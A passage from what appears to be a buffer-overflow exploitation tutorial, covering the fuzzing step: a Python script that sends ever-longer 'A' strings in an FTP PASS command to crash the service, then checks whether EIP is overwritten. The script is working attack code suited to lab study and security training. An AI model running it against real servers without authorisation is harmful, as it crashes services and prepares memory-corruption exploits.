4. Fuzzing
The following Python script can be modified and used to fuzz remote entry points to an application. It will send increasingly long buffer strings in the hope that one eventually crashes the application.
import socket, time, sys
ip = "10.0.0.1"
port = 21
timeout = 5
# Create an array of increasing length buffer strings.
buffer = []
counter = 100
while len(buffer) < 30:
buffer.append("A" * counter)
counter += 100
for string in buffer:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
connect = s.connect((ip, port))
s.recv(1024)
s.send("USER username\r\n")
s.recv(1024)
print("Fuzzing PASS with %s bytes" % len(string))
s.send("PASS " + string + "\r\n")
s.recv(1024)
s.send("QUIT\r\n")
s.recv(1024)
s.close()
except:
print("Could not connect to " + ip + ":" + str(port))
sys.exit(0)
time.sleep(1)
Note that, we need to change send
command to the command that we spiked and its format will be identified by seeing the EAX
register in the previous step (spiking). Also add or remove recv
commands according to the messages that the commands send
Finally run this script and check that the EIP register has been overwritten by A's (\x41). Make a note of any other registers that have either been overwritten, or are pointing to space in memory which has been overwritten.
Last updated